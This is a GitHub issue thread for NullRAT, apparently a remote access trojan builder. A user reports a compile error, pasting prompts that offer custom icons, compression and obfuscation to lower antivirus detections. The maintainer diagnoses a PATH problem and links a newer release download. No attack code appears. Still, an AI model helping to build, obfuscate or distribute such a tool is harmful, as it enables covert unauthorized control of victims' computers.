### ISSUE TITLE
Compile Error

### ISSUE THREAD

**Issue by Niraj-Dilshan** [NullCode13/NullRAT#35]
Do you want to use this configuration file? [y/n] (y): y

Do you want to add a custom icon to NullRAT? [y/n] (y): y
Do you want to compress the final executable? (Recommended) [y/n] (y): y

NOTE: Obfuscating NullRAT will decrease the amount of detections!
Do you want to obfuscate NullRAT? [y/n] (y): n

Compile Error
\ Building Non-Obfuscated NullRAT
                                 System.ComponentModel.Win32Exception (2): An error occurred trying to start process 'pyinstaller' with working directory 'C:\Users\INFINITE\Downloads\NullRAT-Release'. The system cannot find the file specified.
   at System.Diagnostics.Process.StartWithShellExecuteEx(ProcessStartInfo )
   at System.Diagnostics.Process.StartCore(ProcessStartInfo )
   at System.Diagnostics.Process.Start()
   at NullRAT.Compiler.ProcessInvoker.RunCmd(String ProgramPath, String Arguments, Boolean ExecuteOnShell) in C:\Users\NullCode\Desktop\NullRAT\compiler\src\Main Operations\ProcessInvoker.cs:line 72
   at NullRAT.Compiler.MakeRAT.CompileRAT(Boolean customIcon, Boolean obfuscate) in C:\Users\NullCode\Desktop\NullRAT\compiler\src\Main Operations\CompileRAT.cs:line 35
   at NullRAT.Compiler.MainActivity.<>c.<Main>b__0_6() in C:\Users\NullCode\Desktop\NullRAT\compiler
/ Building Non-Obfuscated NullRATrtCallback()

**Comment by NullCode1337** [comment]
most probably pip folder not in path

**Comment by NullCode1337** [comment]
please try out NullRAT v7.5 new compiler
https://github.com/NullCode1337/NullRAT/releases/download/v7.5/NullRAT-Release.zip
